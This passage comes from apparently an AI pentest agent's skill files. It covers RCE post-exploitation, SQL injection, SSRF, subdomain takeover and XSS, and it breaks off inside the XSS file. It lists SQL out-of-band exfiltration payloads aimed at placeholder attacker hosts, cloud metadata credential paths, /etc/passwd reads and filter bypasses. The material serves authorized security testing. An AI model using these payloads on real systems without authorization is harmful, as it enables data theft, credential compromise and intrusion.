(busybox, sh, env)\n- Windows variations (PowerShell vs CMD)\n- Constrained language bypasses\n\n## Post-Exploitation\n\n**Privilege Escalation**\n- `sudo -l`; SUID binaries; capabilities (`getcap -r / 2>/dev/null`)\n\n**Persistence**\n- cron/systemd/user services; web shell behind auth\n- Plugin hooks; supply chain in CI/CD\n\n**Lateral Movement**\n- SSH keys, cloud metadata credentials, internal service tokens\n\n## Testing Methodology\n\n1. **Identify sinks** - Command wrappers, template rendering, deserialization, file converters, report generators, plugin hooks\n2. **Establish oracle** - Timing, DNS/HTTP callbacks, or deterministic output diffs (length/ETag)\n3. **Confirm context** - User, working directory, PATH, shell, SELinux/AppArmor, containerization\n4. **Map boundaries** - Read/write locations, outbound egress\n5. **Progress to control** - File write, scheduled execution, service restart hooks\n\n## Validation\n\n1. Provide a minimal, reliable oracle (DNS/HTTP/timing) proving code execution\n2. Show command context (uid, gid, cwd, env) and controlled output\n3. Demonstrate persistence or file write under application constraints\n4. If containerized, prove boundary crossing attempts (host files, kube APIs) and whether they succeed\n5. Keep PoCs minimal and reproducible across runs and transports\n\n## False Positives\n\n- Only crashes or timeouts without controlled behavior\n- Filtered execution of a limited command subset with no attacker-controlled args\n- Sandboxed interpreters executing in a restricted VM with no IO or process spawn\n- Simulated outputs not derived from executed commands\n\n## Impact\n\n- Remote system control under application user; potential privilege escalation to root\n- Data theft, encryption/signing key compromise, supply-chain insertion, lateral movement\n- Cluster compromise when combined with container/Kubernetes misconfigurations\n\n## Pro Tips\n\n1. Prefer OAST oracles; avoid long sleepsβ€”short gated delays reduce noise\n2. When command injection is weak, pivot to file write or deserialization/SSTI paths\n3. Treat converters/renderers as first-class sinks; many run out-of-process with powerful delegates\n4. For Java/.NET, enumerate classpaths/assemblies and known gadgets; verify with out-of-band payloads\n5. Confirm environment: PATH, shell, umask, SELinux/AppArmor, container caps\n6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies\n7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops\n\n## Summary\n\nRCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.\n" }, { "path": "strix/skills/vulnerabilities/sql_injection.md", "content": "---\nname: sql-injection\ndescription: SQL injection testing covering union, blind, error-based, and ORM bypass techniques\n---\n\n# SQL Injection\n\nSQLi remains one of the most durable and impactful vulnerability classes. Modern exploitation focuses on parser differentials, ORM/query-builder edges, JSON/XML/CTE/JSONB surfaces, out-of-band exfiltration, and subtle blind channels. Treat every string concatenation into SQL as suspect.\n\n## Attack Surface\n\n**Databases**\n- Classic relational: MySQL/MariaDB, PostgreSQL, MSSQL, Oracle\n- Newer surfaces: JSON/JSONB operators, full-text/search, geospatial, window functions, CTEs, lateral joins\n\n**Integration Paths**\n- ORMs, query builders, stored procedures\n- Search servers, reporting/exporters\n\n**Input Locations**\n- Path/query/body/header/cookie\n- Mixed encodings (URL, JSON, XML, multipart)\n- Identifier vs value: table/column names (require quoting/escaping) vs literals (quotes/CAST requirements)\n- Query builders: `whereRaw`/`orderByRaw`, string templates in ORMs\n- JSON coercion or array containment operators\n- Batch/bulk endpoints and report generators that embed filters directly\n\n## Detection Channels\n\n**Error-Based**\n- Provoke type/constraint/parser errors revealing stack/version/paths\n\n**Boolean-Based**\n- Pair requests differing only in predicate truth\n- Diff status/body/length/ETag\n\n**Time-Based**\n- `SLEEP`/`pg_sleep`/`WAITFOR`\n- Use subselect gating to avoid global latency noise\n\n**Out-of-Band (OAST)**\n- DNS/HTTP callbacks via DB-specific primitives\n\n## DBMS Primitives\n\n### MySQL\n\n- Version/user/db: `@@version`, `database()`, `user()`, `current_user()`\n- Error-based: `extractvalue()`/`updatexml()` (older), JSON functions for error shaping\n- File IO: `LOAD_FILE()`, `SELECT ... INTO DUMPFILE/OUTFILE` (requires FILE privilege, secure_file_priv)\n- OOB/DNS: `LOAD_FILE(CONCAT('\\\\\\\\',database(),'.attacker.com\\\\a'))`\n- Time: `SLEEP(n)`, `BENCHMARK`\n- JSON: `JSON_EXTRACT`/`JSON_SEARCH` with crafted paths; GIS funcs sometimes leak\n\n### PostgreSQL\n\n- Version/user/db: `version()`, `current_user`, `current_database()`\n- Error-based: raise exception via unsupported casts or division by zero; `xpath()` errors in xml2\n- OOB: `COPY (program ...)` or dblink/foreign data wrappers (when enabled); http extensions\n- Time: `pg_sleep(n)`\n- Files: `COPY table TO/FROM '/path'` (requires superuser), `lo_import`/`lo_export`\n- JSON/JSONB: operators `->`, `->>`, `@>`, `?|` with lateral/CTE for blind extraction\n\n### MSSQL\n\n- Version/db/user: `@@version`, `db_name()`, `system_user`, `user_name()`\n- OOB/DNS: `xp_dirtree`, `xp_fileexist`; HTTP via OLE automation (`sp_OACreate`) if enabled\n- Exec: `xp_cmdshell` (often disabled), `OPENROWSET`/`OPENDATASOURCE`\n- Time: `WAITFOR DELAY '0:0:5'`; heavy functions cause measurable delays\n- Error-based: convert/parse, divide by zero, `FOR XML PATH` leaks\n\n### Oracle\n\n- Version/db/user: banner from `v$version`, `ora_database_name`, `user`\n- OOB: `UTL_HTTP`/`DBMS_LDAP`/`UTL_INADDR`/`HTTPURITYPE` (permissions dependent)\n- Time: `dbms_lock.sleep(n)`\n- Error-based: `to_number`/`to_date` conversions, `XMLType`\n- File: `UTL_FILE` with directory objects (privileged)\n\n## Key Vulnerabilities\n\n### UNION-Based Extraction\n\n- Determine column count and types via `ORDER BY n` and `UNION SELECT null,...`\n- Align types with `CAST`/`CONVERT`; coerce to text/json for rendering\n- When UNION is filtered, switch to error-based or blind channels\n\n### Blind Extraction\n\n- Branch on single-bit predicates using `SUBSTRING`/`ASCII`, `LEFT`/`RIGHT`, or JSON/array operators\n- Binary search on character space for fewer requests\n- Encode outputs (hex/base64) to normalize\n- Gate delays inside subqueries to reduce noise: `AND (SELECT CASE WHEN (predicate) THEN pg_sleep(0.5) ELSE 0 END)`\n\n### Out-of-Band\n\n- Prefer OAST to minimize noise and bypass strict response paths\n- Embed data in DNS labels or HTTP query params\n- MSSQL: `xp_dirtree \\\\\\\\.attacker.tld\\\\a`\n- Oracle: `UTL_HTTP.REQUEST('http://.attacker')`\n- MySQL: `LOAD_FILE` with UNC path\n\n### Write Primitives\n\n- Auth bypass: inject OR-based tautologies or subselects into login checks\n- Privilege changes: update role/plan/feature flags when UPDATE is injectable\n- File write: `INTO OUTFILE`/`DUMPFILE`, `COPY TO`, `xp_cmdshell` redirection\n- Job/proc abuse: schedule tasks or create procedures/functions when permissions allow\n\n### ORM and Query Builders\n\n- Dangerous APIs: `whereRaw`/`orderByRaw`, string interpolation into LIKE/IN/ORDER clauses\n- Injections via identifier quoting (table/column names) when user input is interpolated into identifiers\n- JSON containment operators exposed by ORMs (e.g., `@>` in PostgreSQL) with raw fragments\n- Parameter mismatch: partial parameterization where operators or lists remain unbound (`IN (...)`)\n\n### Uncommon Contexts\n\n- ORDER BY/GROUP BY/HAVING with `CASE WHEN` for boolean channels\n- LIMIT/OFFSET: inject into OFFSET to produce measurable timing or page shape\n- Full-text/search helpers: `MATCH AGAINST`, `to_tsvector`/`to_tsquery` with payload mixing\n- XML/JSON functions: error generation via malformed documents/paths\n\n## Bypass Techniques\n\n**Whitespace/Spacing**\n- `/**/`, `/**/!00000`, comments, newlines, tabs\n- `0xe3 0x80 0x80` (ideographic space)\n\n**Keyword Splitting**\n- `UN/**/ION`, `U%4eION`, backticks/quotes, case folding\n\n**Numeric Tricks**\n- Scientific notation, signed/unsigned, hex (`0x61646d696e`)\n\n**Encodings**\n- Double URL encoding, mixed Unicode normalizations (NFKC/NFD)\n- `char()`/`CONCAT_ws` to build tokens\n\n**Clause Relocation**\n- Subselects, derived tables, CTEs (`WITH`), lateral joins to hide payload shape\n\n## Testing Methodology\n\n1. **Identify query shape** - SELECT/INSERT/UPDATE/DELETE, presence of WHERE/ORDER/GROUP/LIMIT/OFFSET\n2. **Determine input influence** - User input in identifiers vs values\n3. **Confirm injection class** - Reflective errors, boolean diffs, timing, or out-of-band callbacks\n4. **Choose quietest oracle** - Prefer error-based or boolean over noisy time-based\n5. **Establish extraction channel** - UNION (if visible), error-based, boolean bit extraction, time-based, or OAST/DNS\n6. **Pivot to metadata** - version, current user, database name\n7. **Target high-value tables** - auth bypass, role changes, filesystem access if feasible\n\n## Validation\n\n1. Show a reliable oracle (error/boolean/time/OAST) and prove control by toggling predicates\n2. Extract verifiable metadata (version, current user, database name) using the established channel\n3. Retrieve or modify a non-trivial target (table rows, role flag) within legal scope\n4. Provide reproducible requests that differ only in the injected fragment\n5. Where applicable, demonstrate defense-in-depth bypass (WAF on, still exploitable via variant)\n\n## False Positives\n\n- Generic errors unrelated to SQL parsing or constraints\n- Static response sizes due to templating rather than predicate truth\n- Artificial delays from network/CPU unrelated to injected function calls\n- Parameterized queries with no string concatenation, verified by code review\n\n## Impact\n\n- Direct data exfiltration and privacy/regulatory exposure\n- Authentication and authorization bypass via manipulated predicates\n- Server-side file access or command execution (platform/privilege dependent)\n- Persistent supply-chain impact via modified data, jobs, or procedures\n\n## Pro Tips\n\n1. Pick the quietest reliable oracle first; avoid noisy long sleeps\n2. Normalize responses (length/ETag/digest) to reduce variance when diffing\n3. Aim for metadata then jump directly to business-critical tables; minimize lateral noise\n4. When UNION fails, switch to error- or blind-based bit extraction; prefer OAST when available\n5. Treat ORMs as thin wrappers: raw fragments often slip through; audit `whereRaw`/`orderByRaw`\n6. Use CTEs/derived tables to smuggle expressions when filters block SELECT directly\n7. Exploit JSON/JSONB operators in Postgres and JSON functions in MySQL for side channels\n8. Keep payloads portable; maintain DBMS-specific dictionaries for functions and types\n9. Validate mitigations with negative tests and code review; parameterize operators/lists correctly\n10. Document exact query shapes; defenses must match how the query is constructed, not assumptions\n\n## Summary\n\nModern SQLi succeeds where authorization and query construction drift from assumptions. Bind parameters everywhere, avoid dynamic identifiers, and validate at the exact boundary where user input meets SQL.\n" }, { "path": "strix/skills/vulnerabilities/ssrf.md", "content": "---\nname: ssrf\ndescription: SSRF testing for cloud metadata access, internal service discovery, and protocol smuggling\n---\n\n# SSRF\n\nServer-Side Request Forgery enables the server to reach networks and services the attacker cannot. Focus on cloud metadata endpoints, service meshes, Kubernetes, and protocol abuse to turn a single fetch into credentials, lateral movement, and sometimes RCE.\n\n## Attack Surface\n\n**Scope**\n- Outbound HTTP/HTTPS fetchers (proxies, previewers, importers, webhook testers)\n- Non-HTTP protocols via URL handlers (gopher, dict, file, ftp, smb wrappers)\n- Service-to-service hops through gateways and sidecars (envoy/nginx)\n- Cloud and platform metadata endpoints, instance services, and control planes\n\n**Direct URL Params**\n- `url=`, `link=`, `fetch=`, `src=`, `webhook=`, `avatar=`, `image=`\n\n**Indirect Sources**\n- Open Graph/link previews, PDF/image renderers\n- Server-side analytics (Referer trackers), import/export jobs\n- Webhooks/callback verifiers\n\n**Protocol-Translating Services**\n- PDF via wkhtmltopdf/Chrome headless, image pipelines\n- Document parsers, SSO validators, archive expanders\n\n**Less Obvious**\n- GraphQL resolvers that fetch by URL\n- Background crawlers, repository/package managers (git, npm, pip)\n- Calendar (ICS) fetchers\n\n## High-Value Targets\n\n### AWS\n\n- IMDSv1: `http://169.254.169.254/latest/meta-data/` β†’ `/iam/security-credentials/{role}`, `/user-data`\n- IMDSv2: requires token via PUT `/latest/api/token` with header `X-aws-ec2-metadata-token-ttl-seconds`, then include `X-aws-ec2-metadata-token` on subsequent GETs\n- If sink cannot set headers or methods, seek intermediaries that can\n- ECS/EKS task credentials: `http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`\n\n### GCP\n\n- Endpoint: `http://metadata.google.internal/computeMetadata/v1/`\n- Required header: `Metadata-Flavor: Google`\n- Target: `/instance/service-accounts/default/token`\n\n### Azure\n\n- Endpoint: `http://169.254.169.254/metadata/instance?api-version=2021-02-01`\n- Required header: `Metadata: true`\n- MSI OAuth: `/metadata/identity/oauth2/token`\n\n### Kubernetes\n\n- Kubelet: 10250 (authenticated) and 10255 (deprecated read-only)\n- Probe `/pods`, `/metrics`, exec/attach endpoints\n- API server: `https://kubernetes.default.svc/`\n- Authorization often needs service account token; SSRF that propagates headers/cookies may reuse them\n- Service discovery: attempt cluster DNS names (`svc.cluster.local`) and default services (kube-dns, metrics-server)\n\n### Internal Services\n\n- Docker API: `http://localhost:2375/v1.24/containers/json` (no TLS variants often internal-only)\n- Redis/Memcached: `dict://localhost:11211/stat`, gopher payloads to Redis on 6379\n- Elasticsearch/OpenSearch: `http://localhost:9200/_cat/indices`\n- Message brokers/admin UIs: RabbitMQ, Kafka REST, Celery/Flower, Jenkins crumb APIs\n- FastCGI/PHP-FPM: `gopher://localhost:9000/` (craft records for file write/exec when app routes to FPM)\n\n## Key Vulnerabilities\n\n### Protocol Exploitation\n\n**Gopher**\n- Speak raw text protocols (Redis/SMTP/IMAP/HTTP/FCGI)\n- Use to craft multi-line payloads, schedule cron via Redis, or build FastCGI requests\n\n**File and Wrappers**\n- `file:///etc/passwd`, `file:///proc/self/environ` when libraries allow file handlers\n- `jar:`, `netdoc:`, `smb://` and language-specific wrappers (`php://`, `expect://`) where enabled\n\n### Address Variants\n\n- Loopback: `127.0.0.1`, `127.1`, `2130706433`, `0x7f000001`, `::1`, `[::ffff:127.0.0.1]`\n- RFC1918/link-local: 10/8, 172.16/12, 192.168/16, 169.254/16\n- Test IPv6-mapped and mixed-notation forms\n\n### URL Confusion\n\n- Userinfo and fragments: `http://internal@attacker/` or `http://attacker#@internal/`\n- Scheme-less/relative forms the server might complete internally: `//169.254.169.254/`\n- Trailing dots and mixed case: `internal.` vs `INTERNAL`, Unicode dot lookalikes\n\n### Redirect Abuse\n\n- Allowlist only applied pre-redirect: 302 from attacker β†’ internal host\n- Test multi-hop and protocol switches (httpβ†’file/gopher via custom clients)\n\n### Header and Method Control\n\n- Some sinks reflect or allow CRLF-injection into the request line/headers\n- If arbitrary headers/methods are possible, IMDSv2, GCP, and Azure become reachable\n\n## Bypass Techniques\n\n**Address Encoding**\n- Decimal, hex, octal representations of IP addresses\n- IPv6 variants, IPv4-mapped IPv6, mixed notation\n\n**DNS Rebinding**\n- First resolution returns allowed IP, second returns internal target\n- Use short TTL DNS records under attacker control\n\n**URL Parser Differentials**\n- Different parsing between allowlist checker and actual fetcher\n- Exploit inconsistencies in scheme, host, port, path handling\n\n**Redirect Chains**\n- Initial URL passes allowlist, redirect targets internal host\n- Protocol downgrade/upgrade through redirects\n\n## Blind SSRF\n\n- Use OAST (DNS/HTTP) to confirm egress\n- Derive internal reachability from timing, response size, TLS errors, and ETag differences\n- Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs)\n\n## Chaining Attacks\n\n- SSRF β†’ Metadata creds β†’ cloud API access (list buckets, read secrets)\n- SSRF β†’ Redis/FCGI/Docker β†’ file write/command execution β†’ shell\n- SSRF β†’ Kubelet/API β†’ pod list/logs β†’ token/secret discovery β†’ lateral movement\n\n## Testing Methodology\n\n1. **Identify surfaces** - Every user-influenced URL/host/path across web/mobile/API and background jobs\n2. **Establish oracle** - Quiet OAST DNS/HTTP callbacks first\n3. **Internal addressing** - Pivot to loopback, RFC1918, link-local, IPv6, hostnames\n4. **Protocol variations** - Test gopher, file, dict where supported\n5. **Parser differentials** - Test across frameworks, CDNs, and language libraries\n6. **Redirect behavior** - Single-hop, multi-hop, protocol switches\n7. **Header/method control** - Can you influence request headers or HTTP method?\n8. **High-value targets** - Metadata, kubelet, Redis, FastCGI, Docker, Vault, internal admin panels\n\n## Validation\n\n1. Prove an outbound server-initiated request occurred (OAST interaction or internal-only response differences)\n2. Show access to non-public resources (metadata, internal admin, service ports) from the vulnerable service\n3. Where possible, demonstrate minimal-impact credential access (short-lived token) or a harmless internal data read\n4. Confirm reproducibility and document request parameters that control scheme/host/headers/method and redirect behavior\n\n## False Positives\n\n- Client-side fetches only (no server request)\n- Strict allowlists with DNS pinning and no redirect following\n- SSRF simulators/mocks returning canned responses without real egress\n- Blocked egress confirmed by uniform errors across all targets and protocols\n\n## Impact\n\n- Cloud credential disclosure with subsequent control-plane/API access\n- Access to internal control panels and data stores not exposed publicly\n- Lateral movement into Kubernetes, service meshes, and CI/CD\n- RCE via protocol abuse (FCGI, Redis), Docker daemon access, or scriptable admin interfaces\n\n## Pro Tips\n\n1. Prefer OAST callbacks first; then iterate on internal addressing and protocols\n2. Test IPv6 and mixed-notation addresses; filters often ignore them\n3. Observe library/client differences (curl, Java HttpClient, Node, Go); behavior changes across services and jobs\n4. Redirects are leverage: control both the initial allowlisted host and the next hop\n5. Metadata endpoints require headers/methods; verify if your sink can set them or if intermediaries add them\n6. Use tiny payloads and tight timeouts to map ports with minimal noise\n7. When responses are masked, diff length/ETag/status and TLS error classes to infer reachability\n8. Chain quickly to durable impact (short-lived tokens, harmless internal reads) and stop there\n\n## Summary\n\nAny feature that fetches remote content on behalf of a user is a potential tunnel to internal networks and control planes. Bind scheme/host/port/headers explicitly or expect an attacker to route through them.\n" }, { "path": "strix/skills/vulnerabilities/subdomain_takeover.md", "content": "---\nname: subdomain-takeover\ndescription: Subdomain takeover testing for dangling DNS records and unclaimed cloud resources\n---\n\n# Subdomain Takeover\n\nSubdomain takeover lets an attacker serve content from a trusted subdomain by claiming resources referenced by dangling DNS (CNAME/A/ALIAS/NS) or mis-bound provider configurations. Consequences include phishing on a trusted origin, cookie and CORS pivot, OAuth redirect abuse, and CDN cache poisoning.\n\n## Attack Surface\n\n- Dangling CNAME/A/ALIAS to third-party services (hosting, storage, serverless, CDN)\n- Orphaned NS delegations (child zones with abandoned/expired nameservers)\n- Decommissioned SaaS integrations (support, docs, marketing, forms) referenced via CNAME\n- CDN \"alternate domain\" mappings (CloudFront/Fastly/Azure CDN) lacking ownership verification\n- Storage and static hosting endpoints (S3/Blob/GCS buckets, GitHub/GitLab Pages)\n\n## Reconnaissance\n\n### Enumeration Pipeline\n\n- Subdomain inventory: combine CT (crt.sh APIs), passive DNS sources, in-house asset lists, IaC/terraform outputs\n- Resolver sweep: use IPv4/IPv6-aware resolvers; track NXDOMAIN vs SERVFAIL vs provider-branded 4xx/5xx\n- Record graph: build a CNAME graph and collapse chains to identify external endpoints\n\n### DNS Indicators\n\n- CNAME targets ending in provider domains: `github.io`, `amazonaws.com`, `cloudfront.net`, `azurewebsites.net`, `blob.core.windows.net`, `fastly.net`, `vercel.app`, `netlify.app`, `herokudns.com`, `trafficmanager.net`, `azureedge.net`, `akamaized.net`\n- Orphaned NS: subzone delegated to nameservers on a domain that has expired or no longer hosts authoritative servers\n- MX to third-party mail providers with decommissioned domains\n- TXT/verification artifacts (`asuid`, `_dnsauth`, `_github-pages-challenge`) suggesting previous external bindings\n\n### HTTP Fingerprints\n\nService-specific unclaimed messages (examples):\n- **GitHub Pages**: \"There isn't a GitHub Pages site here.\"\n- **Fastly**: \"Fastly error: unknown domain\"\n- **Heroku**: \"No such app\" or \"There's nothing here, yet.\"\n- **S3 static site**: \"NoSuchBucket\" / \"The specified bucket does not exist\"\n- **CloudFront**: 403/400 with \"The request could not be satisfied\"\n- **Azure App Service**: default 404 for azurewebsites.net unless custom-domain verified\n- **Shopify**: \"Sorry, this shop is currently unavailable\"\n\nTLS clues: certificate CN/SAN referencing provider default host instead of the custom subdomain\n\n## Key Vulnerabilities\n\n### Claim Third-Party Resource\n\n- Create the resource with the exact required name:\n - Storage/hosting: S3 bucket \"sub.example.com\" (website endpoint)\n - Pages hosting: create repo/site and add the custom domain\n - Serverless/app hosting: create app/site matching the target hostname\n\n### CDN Alternate Domains\n\n- Add the victim subdomain as an alternate domain on your CDN distribution if the provider does not enforce domain ownership checks\n- Upload a TLS cert or use managed cert issuance\n\n### NS Delegation Takeover\n\n- If a child zone is delegated to nameservers under an expired domain, register that domain and host authoritative NS\n- Publish records to control all hosts under the delegated subzone\n\n### Mail Surface\n\n- If MX points to a decommissioned provider, takeover could enable email receipt for that subdomain\n\n## Advanced Techniques\n\n### Blind and Cache Channels\n\n- CDN edge behavior: 404/421 vs 403 differentials reveal whether an alt name is partially configured\n- Cache poisoning: once taken over, exploit cache keys to persist malicious responses\n\n### CT and TLS\n\n- Use CT logs to detect unexpected certificate issuance for your subdomain\n- For PoC, issue a DV cert post-takeover (within scope) to produce verifiable evidence\n\n### OAuth and Trust Chains\n\n- If the subdomain is whitelisted as an OAuth redirect/callback or in CSP/script-src, takeover elevates to account takeover or script injection\n\n### Verification Gaps\n\n- Look for providers that accept domain binding prior to TXT verification\n- Race windows: re-claim resource names immediately after victim deletion\n\n### Wildcards and Fallbacks\n\n- Wildcard CNAMEs to providers may expose unbounded subdomains\n- Fallback origins: CDNs configured with multiple origins may expose unknown-domain responses\n\n## Special Contexts\n\n### Storage and Static\n\n- S3/GCS/Azure Blob static sites: bucket naming constraints dictate whether a bucket can match hostname\n- Website vs API endpoints differ in claimability and fingerprints\n\n### Serverless and Hosting\n\n- GitHub/GitLab Pages, Netlify, Vercel, Azure Static Web Apps: domain binding flows vary\n- Most require TXT now, but historical projects may not\n\n### CDN and Edge\n\n- CloudFront/Fastly/Azure CDN/Akamai: alternate domain verification differs\n- Some products historically allowed alt-domain claims without proof\n\n### DNS Delegations\n\n- Child-zone NS delegations outrank parent records\n- Control of delegated NS yields full control of all hosts below that label\n\n## Testing Methodology\n\n1. **Enumerate subdomains** - Aggregate CT logs, passive DNS, and org inventory\n2. **Resolve DNS** - All RR types: A/AAAA, CNAME, NS, MX, TXT; keep CNAME chains\n3. **HTTP/TLS probe** - Capture status, body, error text, Server headers, certificate SANs\n4. **Fingerprint providers** - Map known \"unclaimed/missing resource\" signatures\n5. **Attempt claim** (with authorization) - Create missing resource with exact required name\n6. **Validate control** - Serve minimal unique payload; confirm over HTTPS\n\n## Validation\n\n1. Before: record DNS chain, HTTP response (status/body length/fingerprint), and TLS details\n2. After claim: serve unique content and verify over HTTPS at the target subdomain\n3. Optional: issue a DV certificate (legal scope) and reference CT entry as evidence\n4. Demonstrate impact chains (CSP/script-src trust, OAuth redirect acceptance, cookie Domain scoping)\n\n## False Positives\n\n- \"Unknown domain\" pages that are not claimable due to enforced TXT/ownership checks\n- Provider-branded default pages for valid, owned resources (not a takeover)\n- Soft 404s from your own infrastructure or catch-all vhosts\n\n## Impact\n\n- Content injection under trusted subdomain: phishing, malware delivery, brand damage\n- Cookie and CORS pivot: if parent site sets Domain-scoped cookies or allows subdomain origins\n- OAuth/SSO abuse via whitelisted redirect URIs\n- Email delivery manipulation for subdomain\n\n## Pro Tips\n\n1. Build a pipeline: enumerate (subfinder/amass) β†’ resolve (dnsx) β†’ probe (httpx) β†’ fingerprint (nuclei/custom) β†’ verify claims\n2. Maintain a current fingerprint corpus; provider messages change frequently\n3. Prefer minimal PoCs: static \"ownership proof\" page and, where allowed, DV cert issuance\n4. Monitor CT for unexpected certs on your subdomains\n5. Eliminate dangling DNS in decommission workflows first\n6. For NS delegations, treat any expired nameserver domain as critical\n7. Use CAA to limit certificate issuance while you triage\n\n## Summary\n\nSubdomain safety is lifecycle safety: if DNS points at anything, you must own and verify the thing on every provider and product path. Remove or verifyβ€”there is no safe middle.\n" }, { "path": "strix/skills/vulnerabilities/xss.md", "content": "---\nname: xss\ndescription: XSS testing covering reflected, stored, and DOM-based vectors with CSP bypass techniques\n---\n\n# XSS\n\nCross-site scripting persists because context, parser, and framework edges are complex. Treat every user-influenced string as untrusted until it is strictly encoded for the exact sink and guarded by runtime policy (CSP/Trusted Types).\n\n## Attack Surface\n\n**Types**\n- Reflected, stored, and DOM-based XSS across web/mobile/desktop shells\n\n**Contexts**\n- HTML, attribute, URL, JS, CSS, SVG/MathML, Markdown, PDF\n\n**Frameworks**\n- React/Vue/Angular/Svelte sinks, template engines, SSR/ISR\n\n**Defenses to Bypass**\n- CSP/Trusted Types, DOMPurify, framework auto-escaping\n\n## Injection Points\n\n**Server Render**\n- Templates (Jinja/EJS/Handlebars), SSR frameworks, email/PDF renderers\n\n**Client Render**\n- `innerHTML`/`outerHTML`/`insertAdjacentHTML`, template literals\n- `dangerouslySetInnerHTML`, `v-html`, `$sce.trustAsHtml`, Svelte `{@html}`\n\n**URL/DOM**\n- `location.hash`/`search`, `document.referrer`, base href, `data-*` attributes\n\n**Events/Handlers**\n- `onerror`/`onload`/`onfocus`/`onclick` and `javascript:` URL handlers\n\n**Cross-Context**\n- postMessage payloads, WebSocket messages, local/sessionStorage, IndexedDB\n\n**File/Metadata**\n- Image/SVG/XML names and EXIF, office documents processed server/client\n\n## Context Encoding Rules\n\n- **HTML text**: encode `< > & \" '`\n- **Attribute value**: encode `\" ' < > &` and ensure attribute quoted; avoid unquoted attributes\n- **URL/JS URL**: encode and validate scheme (allowlist https/mailto/tel); disallow javascript/data\n- **JS string**: escape quotes, backslashes, newlines; prefer `JSON.stringify`\n- **CSS**: avoid injecting into style; sanitize property names/values; beware `url()` and `expression()`\n- **SVG/MathML**: treat as active content; many tags execute via onload or animation events\n\n## Key Vulnerabilities\n\n### DOM XSS\n\n**Sources**\n- `location.*` (hash/search), `document.referrer`, postMessage, storage, service worker messages\n\n**Sinks**\n- `innerHTML`/`outerHTML`/`insertAdjacentHTML`, `document.write`\n- `setAttribute`, `setTimeout`/`setInterval` with strings\n- `eval`/`Function`, `new Worker` with blob URLs\n\n**Vulnerable Pattern**\n```javascript\nconst q = new URLSearchParams(location.search).get('q');\nresults.innerHTML = `
  • ${q}
    • `;\n```\nExploit: `?q=`\n\n### Mutation XSS\n\nLeverage parser repairs to morph safe-looking markup into executable code (e.g., noscript, malformed tags):\n```html\n